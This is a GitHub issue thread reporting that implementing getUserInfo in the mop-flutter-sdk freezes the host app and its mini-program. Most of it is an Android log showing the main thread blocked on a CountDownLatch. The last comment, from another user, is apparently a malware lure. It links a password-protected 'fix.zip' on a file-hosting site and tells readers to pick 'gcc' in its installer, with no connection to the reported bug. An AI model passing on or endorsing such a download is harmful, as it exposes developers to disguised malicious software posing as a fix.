### ISSUE TITLE
app端实现getuserinfo会导致app和小程序卡死

### ISSUE THREAD

**Issue by linwindows** [finogeeks/mop-flutter-sdk#19]
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/ContentCatcher_catcher(28571): WebViewController : catchHtmlBody() mContentLoadingState=StateLoading
D/ContentCatcher_catcher(28571): WebViewController : sJsInject true
D/ContentCatcher_catcher(28571): WebViewController : WebViewCallback-onCallback
D/ContentCatcher_catcher(28571): WebViewController : webviewvalue-onCallback: ""
D/ContentCatcher_catcher(28571): WebViewController : value.length: 2
D/ContentCatcher_catcher(28571): WebViewController : catch result
D/ContentCatcher_catcher(28571): WebViewController : mContentLoadingState = StateLoading
D/AppletHandlerModule(28571): getUserInfo
W/MIUIScout App(28571): Enter APP_SCOUT_WARNING State
W/MIUIScout App(28571):  (Current message: duration=2505ms seq=2456 late=4ms h=android.view.ViewRootImpl$ViewRootHandler c=android.view.View$PerformClick)
D/AppScoutStateMachine(28571): dump trace dirName = 2024-08-28-12-26-29-28571-APP_SCOUT_WARNING-com.example.zy_observer_app
W/MIUIScout App(28571): Event:APP_SCOUT_WARNING Thread:main backtrace:
W/MIUIScout App(28571):     at jdk.internal.misc.Unsafe.park(Native Method)
W/MIUIScout App(28571):     at java.util.concurrent.locks.LockSupport.park(LockSupport.java:211)
W/MIUIScout App(28571):     at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquire(AbstractQueuedSynchronizer.java:715)
W/MIUIScout App(28571):     at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(AbstractQueuedSynchronizer.java:1047)
W/MIUIScout App(28571):     at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:230)
W/MIUIScout App(28571):     at com.finogeeks.mop.api.mop.AppletHandlerModule$2.getUserInfo(AppletHandlerModule.java:211)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.ipc.c.b(FinAppAIDLServiceBinder.kt:64)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a$a.a(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a$a.invoke(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.main.host.HostBase$d.invoke(HostBase.kt:6)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.main.host.HostBase.a(HostBase.kt:51)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a.a(OperateWXData.java:3)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a.invoke(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.AppletScopeManager$requestScope$chainCallback$1.onRequestDone(AppletScopeManager.kt:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.chain.node.AbsScopeChainNode.callbackOrNext(AbsScopeChainNode.kt:2)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.chain.node.ScopeRequestChainNode$setScopeDialogCallback$1.allow(ScopeRequestChainNode.kt:25)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog.allow(AppletScopeDialog.kt:374)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog.allow$default(AppletScopeDialog.kt:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog$onCreate$5.onClick(AppletScopeDialog.kt:1)
W/MIUIScout App(28571):     at android.view.View.performClick(View.java:7797)
W/MIUIScout App(28571):     at android.view.View.performClickInternal(View.java:7774)
W/MIUIScout App(28571):     at android.view.View.-$$Nest$mperformClickInternal(Unknown Source:0)
W/MIUIScout App(28571):     at android.view.View$PerformClick.run(View.java:31138)
W/MIUIScout App(28571):     at android.os.Handler.handleCallback(Handler.java:958)
W/MIUIScout App(28571):     at android.os.Handler.dispatchMessage(Handler.java:99)
W/MIUIScout App(28571):     at android.os.Looper.loopOnce(Looper.java:224)
W/MIUIScout App(28571):     at android.os.Looper.loop(Looper.java:318)
W/MIUIScout App(28571):     at android.app.ActivityThread.main(ActivityThread.java:8759)
W/MIUIScout App(28571):     at java.lang.reflect.Method.invoke(Native Method)
W/MIUIScout App(28571):     at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:561)
W/MIUIScout App(28571):     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1013)
I/zy_observer_app(28571): Thread[6,tid=15977,WaitingInMainSignalCatcherLoop,Thread*=0x7302e46000,peer=0x8980230,"Signal Catcher"]: reacting to signal 3
I/zy_observer_app(28571): 
I/zy_observer_app(28571): Wrote stack traces to tombstoned
W/MIUIScout App(28571): Enter APP_SCOUT_HANG state
W/MIUIScout App(28571):  (Current message: duration=5008ms seq=2456 late=4ms h=android.view.ViewRootImpl$ViewRootHandler c=android.view.View$PerformClick)
D/AppScoutStateMachine(28571): dump trace dirName = 2024-08-28-12-26-31-28571-APP_SCOUT_HANG-com.example.zy_observer_app
W/MIUIScout App(28571): Event:APP_SCOUT_HANG Thread:main backtrace:
W/MIUIScout App(28571):     at jdk.internal.misc.Unsafe.park(Native Method)
W/MIUIScout App(28571):     at java.util.concurrent.locks.LockSupport.park(LockSupport.java:211)
W/MIUIScout App(28571):     at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquire(AbstractQueuedSynchronizer.java:715)
W/MIUIScout App(28571):     at java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(AbstractQueuedSynchronizer.java:1047)
W/MIUIScout App(28571):     at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:230)
W/MIUIScout App(28571):     at com.finogeeks.mop.api.mop.AppletHandlerModule$2.getUserInfo(AppletHandlerModule.java:211)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.ipc.c.b(FinAppAIDLServiceBinder.kt:64)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a$a.a(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a$a.invoke(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.main.host.HostBase$d.invoke(HostBase.kt:6)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.main.host.HostBase.a(HostBase.kt:51)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a.a(OperateWXData.java:3)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.api.n.d$a.invoke(OperateWXData.java:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.AppletScopeManager$requestScope$chainCallback$1.onRequestDone(AppletScopeManager.kt:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.chain.node.AbsScopeChainNode.callbackOrNext(AbsScopeChainNode.kt:2)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.chain.node.ScopeRequestChainNode$setScopeDialogCallback$1.allow(ScopeRequestChainNode.kt:25)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog.allow(AppletScopeDialog.kt:374)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog.allow$default(AppletScopeDialog.kt:1)
W/MIUIScout App(28571):     at com.finogeeks.lib.applet.modules.applet_scope.ui.AppletScopeDialog$onCreate$5.onClick(AppletScopeDialog.kt:1)
W/MIUIScout App(28571):     at android.view.View.performClick(View.java:7797)
W/MIUIScout App(28571):     at android.view.View.performClickInternal(View.java:7774)
W/MIUIScout App(28571):     at android.view.View.-$$Nest$mperformClickInternal(Unknown Source:0)
W/MIUIScout App(28571):     at android.view.View$PerformClick.run(View.java:31138)
W/MIUIScout App(28571):     at android.os.Handler.handleCallback(Handler.java:958)
W/MIUIScout App(28571):     at android.os.Handler.dispatchMessage(Handler.java:99)
W/MIUIScout App(28571):     at android.os.Looper.loopOnce(Looper.java:224)
W/MIUIScout App(28571):     at android.os.Looper.loop(Looper.java:318)
W/MIUIScout App(28571):     at android.app.ActivityThread.main(ActivityThread.java:8759)
W/MIUIScout App(28571):     at java.lang.reflect.Method.invoke(Native Method)
W/MIUIScout App(28571):     at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:561)
W/MIUIScout App(28571):     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1013)
I/zy_observer_app(28571): Thread[6,tid=15977,WaitingInMainSignalCatcherLoop,Thread*=0x7302e46000,peer=0x8980230,"Signal Catcher"]: reacting to signal 3
I/zy_observer_app(28571): 
I/zy_observer_app(28571): Wrote stack traces to tombstoned
I/TeaLog  (28571): s worked:true 60000
D/TrafficStats(28571): tagSocket(227) with statsTag=0xffffffff, statsUid=-1
E/ignored (28571): java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.Object android.content.Context.getSystemService(java.lang.String)' on a null object reference
I/TeaLog  (28571): s worked:true 60000
I/zy_observer_app(28571): Thread[6,tid=15977,WaitingInMainSignalCatcherLoop,Thread*=0x7302e46000,peer=0x8980230,"Signal Catcher"]: reacting to signal 3
I/zy_observer_app(28571): 
W/MIUIScout ANR(28571): AnrScout only want msg within 20s, so stop here
W/MIUIScout ANR(28571): There is no history msgs within 20s
D/MIUIScout ANR(28571): get period history msg: (Current message: duration=85347ms seq=2456 late=4ms h=android.view.ViewRootImpl$ViewRootHandler c=android.view.View$PerformClick)
D/MIUIScout ANR(28571): get period history msg:In recent 20s, total historyMsgCount=0
W/MIUIScout ANR(28571): Print Message Id: 0 MessageInfo: { when=-1m25s341ms callback=android.graphics.HardwareRendererObserver$$ExternalSyntheticLambda0 target=android.view.ViewRootImpl$ViewRootHandler }
W/MIUIScout ANR(28571): Print Message Id: 1 MessageInfo: { when=-1m25s338ms callback=com.finogeeks.mop.api.mop.AppletHandlerModule$2$$ExternalSyntheticLambda4 target=android.os.Handler }
W/MIUIScout ANR(28571): Print Message Id: 2 MessageInfo: { when=-1m25s288ms callback=android.view.View$UnsetPressedState target=android.view.ViewRootImpl$ViewRootHandler }
W/MIUIScout ANR(28571): Print Message Id: 3 MessageInfo: { when=-1m25s146ms what=3 target=android.view.GestureDetector$GestureHandler }
W/MIUIScout ANR(28571): Print Message Id: 4 MessageInfo: { when=-1m22s521ms callback=io.flutter.plugins.webviewflutter.InstanceManager$$ExternalSyntheticLambda0 target=android.os.Handler }
W/MIUIScout ANR(28571): (Print messages: 5, polling=false, quitting=false)
W/zy_observer_app(28571): PerfMonitor async binderTransact :  time=1028ms interface=android.app.IApplicationThread code=66
I/zy_observer_app(28571): Wrote stack traces to tombstoned

**Comment by linwindows** [comment]
sdk 版本2.45.7

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
